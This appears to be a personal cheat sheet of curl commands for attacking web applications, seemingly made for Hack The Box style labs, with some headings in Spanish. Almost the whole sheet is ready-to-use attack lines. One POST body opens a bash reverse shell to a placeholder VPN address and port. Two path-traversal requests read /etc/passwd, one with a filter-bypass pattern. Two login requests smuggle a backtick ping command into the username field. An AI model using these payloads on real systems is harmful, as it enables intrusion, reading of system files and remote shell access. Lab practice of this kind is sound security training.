

::: curl -s -X requestMethod "http://targedWeb.here"
							  GET  POST

::: curl -s -X requestMethod -I -k "http://targedWeb.here"


			-s		'silent'
			-X    'GET   POST  ("requestMethod")'
			-I    'Fetch the headers only'
			-k    'This option makes curl skip the verification step and proceed without checking'


::: curl -s -X requestMethod "http://$(mvnb)/........" -d '/bin/bash -c "/bin/bash -i >& /dev/tcp/ip_vpn_here/port_vpn_here 0>&1"'




*** *** PATH

	::: curl -s -X GET "http://targed_url_here.htb/index.php?page=....//....//....//....//....//....//....//etc/passwd"

	::: curl -s -X GET "http://targed_url_here.htb/index.php?page=../../../../../../../etc/passwd"  --path-as-is			...<3 <3 <3


*** *** *** WEB AVANZADO WEB AVANZADO

	:::  curl  http://test.test/test/login  --data 'username=;`ping -c 4 -4 ip_vpn_here`'
	:::  curl  http://test.test/test/login  --data-urlencode 'username=;`ping -c 4 -4 ip_vpn_here`'     "encodea con --data-urlencode ......<3 <3 <3"
